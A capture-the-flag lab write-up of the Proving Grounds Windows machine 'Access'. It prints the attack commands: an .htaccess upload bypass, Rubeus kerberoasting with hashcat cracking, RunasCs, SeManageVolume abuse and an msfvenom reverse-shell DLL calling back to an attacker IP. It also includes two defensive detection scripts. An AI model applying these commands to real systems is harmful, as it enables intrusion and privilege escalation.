Access
Source: Proving Grounds | OS: Windows | Community Rating: Very Hard
Enumeration & Reconnaissance
Started with autorecon again. It showed lots and lots of ports, so there's no point in listing them all.
Service Analysis
I began with HTTP (80), which was a simple page featuring a "buy ticket" function that included a file upload capability.

The fuzzers in the background also exposed the "uploads" directory, so cool, I guess we need to upload a shell.
Gaining Initial Access
I first tried uploading a PHP shell, but nothing worked. I attempted known file upload restriction bypasses, null byte, different extension names, double extensions, but none of them did the trick.
Then I tried another approach: what if I created a new extension that gets treated as PHP? This is where .htaccess comes in handy. I created a .htaccess file with the following content:
AddType application/x-httpd-php .puss

I then uploaded this file and it worked, the file got uploaded (note that it doesn’t appear in the uploads directory because it’s a hidden file).

Now that this is in place, I can upload files with the .puss extension and they will be treated as PHP files. So I uploaded my shell again, this time with the .puss extension, and it worked. Now I have a web shell. Using the web shell, I uploaded a reverse shell and ran it, which gave me a reverse shell.

I checked the user I got the shell as and it was access\svc_apache. I then uploaded winPEAS and ran it to check for privilege escalation. It showed that we are in a domain, access.offsec (no surprises, I knew it was an AD machine I was preparing for), and there is another user, svc_mssql.

Lateral Movement & Privilege Escalation
I tried the FullPowers script that attempts to restore privileges of service accounts, but that didn’t work. I checked for other PE vectors using the svc_apache account but nothing obvious hit, so I turned to lateral movement targeting svc_mssql. Since it’s an Active Directory machine, I applied some techniques I had been learning over the past few weeks.

I started with kerberoasting. I uploaded rubeus.exe and ran:
.\Rubeus.exe kerberoast /outfile:hash #Got the hash
sudo hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force #Crack the hash

This revealed the password to be trustno1.
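From the defender's side, the Rubeus run above leaves a clear trace: every roastable SPN gets a TGS request logged as Security event 4769, and Rubeus asks for RC4 (encryption type 0x17) by default so the hash cracks faster. As an added example (not from the original write-up), here is a small Python detector that scans 4769 records for RC4 service tickets issued for non-machine accounts and groups them by requester. The event records are constructed samples that mirror the field names of the real event; "svc_backup" and the "alice" and "DC01$" principals are invented for the sample.

```python
from collections import defaultdict

# Constructed Security event 4769 records (not real logs); the keys follow the
# event's XML data names so the logic transfers to a real export.
SAMPLE_4769 = [
    # Rubeus-style roast: RC4 tickets for two different service accounts in a row.
    {"TargetUserName": "svc_apache@ACCESS.OFFSEC", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.113.187"},
    {"TargetUserName": "svc_apache@ACCESS.OFFSEC", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.113.187"},
    # Normal traffic: AES ticket for a machine account, and an AES ticket for a real logon.
    {"TargetUserName": "DC01$@ACCESS.OFFSEC", "ServiceName": "WEB01$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:192.168.113.10"},
    {"TargetUserName": "alice@ACCESS.OFFSEC", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:192.168.113.50"},
    # Renewal against krbtgt with RC4 is not a roast indicator on its own.
    {"TargetUserName": "alice@ACCESS.OFFSEC", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.113.50"},
    # Failed request: no ticket was issued, so nothing to crack.
    {"TargetUserName": "svc_apache@ACCESS.OFFSEC", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "Status": "0x1b", "IpAddress": "::ffff:192.168.113.187"},
]

RC4_ETYPES = {"0x17", "0x18"}          # RC4-HMAC and RC4-HMAC-EXP
IGNORED_SERVICES = {"krbtgt"}          # TGT traffic, not a service account SPN


def is_roast_candidate(ev: dict) -> bool:
    """True when the event is a successfully issued RC4 ticket for a user-owned SPN."""
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() in IGNORED_SERVICES:
        return False                   # machine accounts have unguessable passwords
    if ev["Status"] != "0x0":
        return False                   # nothing issued, nothing to crack
    return ev["TicketEncryptionType"].lower() in RC4_ETYPES


def find_kerberoast(events: list, threshold: int = 1) -> dict:
    """Group candidate events by (requester, source IP); return those with at
    least `threshold` distinct services, since roasting tools enumerate every SPN."""
    hits = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            hits[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in hits.items() if len(v) >= threshold}


if __name__ == "__main__":
    for (who, ip), services in find_kerberoast(SAMPLE_4769).items():
        print(f"{who} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

In an environment where service accounts have AES keys and RC4 is disabled, the encryption-type check alone will not fire; the distinct-service count per requester (the `threshold` argument) is the signal that still holds, because a roast requests a ticket for every SPN it can find. The durable mitigation on the page's own finding is the password: a kerberoast only pays off when the service account's password is in a wordlist, as trustno1 was here.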

Now we have credentials for svc_mssql. I tried using these newly acquired credentials through various methods:
evil-winrm -i 192.168.113.187 -u svc_mssql -p trustno1
impacket-psexec svc_mssql@192.168.113.187


Neither worked: the account had no access to the SMB shares, so that failed. I then tried runas:
runas /user:access.offsec\svc_mssql cmd.exe

That wouldn’t let me type the password. I then tried a new tool, Invoke-RunasCs. I uploaded the PowerShell script and ran:
powershell -ep bypass
Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\Users\Public\shell1.exe"

Now that we are in as svc_mssql, I checked around for further privilege escalation vectors, but the usual impersonation privilege wasn't present. I tried FullPowers but still nothing. After searching further, I discovered I could use SeManageVolumePrivilege to escalate.
Someone had made a PoC on GitHub that granted access to the entire C: drive:
.\SeManageVolumeExploit.exe

Now that we have access over the C: drive we have multiple ways to escalate our privilege. According to the PoC, one method involved overwriting a DLL. The steps were:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.201 LPORT=9915 -f dll -o shell.dll #Create a DLL reverse shell
#Replace C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll with the malicious DLL
#Initiate the PrintNotify object by executing the following PowerShell commands:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
Doing this, I got back a shell as SYSTEM.
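The escalation above depends on a service account being able to overwrite a DLL under System32 that a SYSTEM-level COM server later loads. Whatever privilege made the write possible, the write itself is the observable event. As an added example (not from the original write-up), here is a Python check over file-creation telemetry in the style of Sysmon Event ID 11 that flags executable files written beneath protected system directories by anyone other than SYSTEM or TrustedInstaller. The records are constructed samples; the protected-path list and trusted-writer set are assumptions a practitioner would tune to their own baseline.

```python
# Constructed Sysmon Event ID 11 (FileCreate) style records; not real telemetry.
# "User", "Image" and "TargetFilename" are the real event's field names.
SAMPLE_FILE_EVENTS = [
    # The step from the write-up: a service account replaces a spooler driver DLL.
    {"User": "ACCESS\\svc_mssql", "Image": "C:\\Windows\\System32\\cmd.exe",
     "TargetFilename": "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Printconfig.dll"},
    # Legitimate: the spooler itself (as SYSTEM) installing a driver file.
    {"User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\spoolsv.exe",
     "TargetFilename": "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Printconfig.dll"},
    # Legitimate: Windows servicing writing under System32.
    {"User": "NT SERVICE\\TrustedInstaller", "Image": "C:\\Windows\\servicing\\TrustedInstaller.exe",
     "TargetFilename": "C:\\Windows\\System32\\ntdll.dll"},
    # Outside protected paths: a user dropping an exe in a writable folder is a
    # different (lower-severity) signal and is not what this check is for.
    {"User": "ACCESS\\svc_mssql", "Image": "C:\\Windows\\System32\\cmd.exe",
     "TargetFilename": "C:\\Users\\Public\\shell1.exe"},
    # Protected path but not code: a log file in System32 by a service account.
    {"User": "ACCESS\\svc_mssql", "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetFilename": "C:\\Windows\\System32\\LogFiles\\app.log"},
]

# Directories where only the OS should be dropping code (assumed baseline).
PROTECTED_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)
# Principals expected to write there during normal servicing (assumed baseline).
TRUSTED_WRITERS = {"nt authority\\system", "nt service\\trustedinstaller"}
# Loadable code: the file types a hijack needs to plant.
CODE_EXTENSIONS = (".dll", ".exe", ".sys", ".ocx", ".cpl")


def is_suspicious_write(ev: dict) -> bool:
    """True for a code file landing in a protected directory from an untrusted writer."""
    path = ev["TargetFilename"].lower()
    if not path.startswith(PROTECTED_PREFIXES):
        return False
    if not path.endswith(CODE_EXTENSIONS):
        return False
    return ev["User"].lower() not in TRUSTED_WRITERS


def flag_protected_writes(events: list) -> list:
    """Return the events that should raise an alert, in input order."""
    return [ev for ev in events if is_suspicious_write(ev)]


if __name__ == "__main__":
    for ev in flag_protected_writes(SAMPLE_FILE_EVENTS):
        print(f"ALERT: {ev['User']} wrote {ev['TargetFilename']} via {ev['Image']}")
```

The same alert would have fired on the earlier FullPowers or token-based attempts had they succeeded, because the DLL still has to be written to disk; auditing which service accounts hold SeManageVolumePrivilege (it is granted to Administrators only by default) is the preventive half of the same control.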

Lessons Learned
File upload restrictions can sometimes be bypassed by redefining file types using .htaccess. This allowed me to execute PHP code from a non-standard extension.
In AD environments, lateral movement using kerberoasting is an effective method to pivot from one service account to another.
When standard privilege escalation tools (like FullPowers) don’t work, alternative vectors, such as abusing SeManageVolumePrivilege, can provide a path to SYSTEM.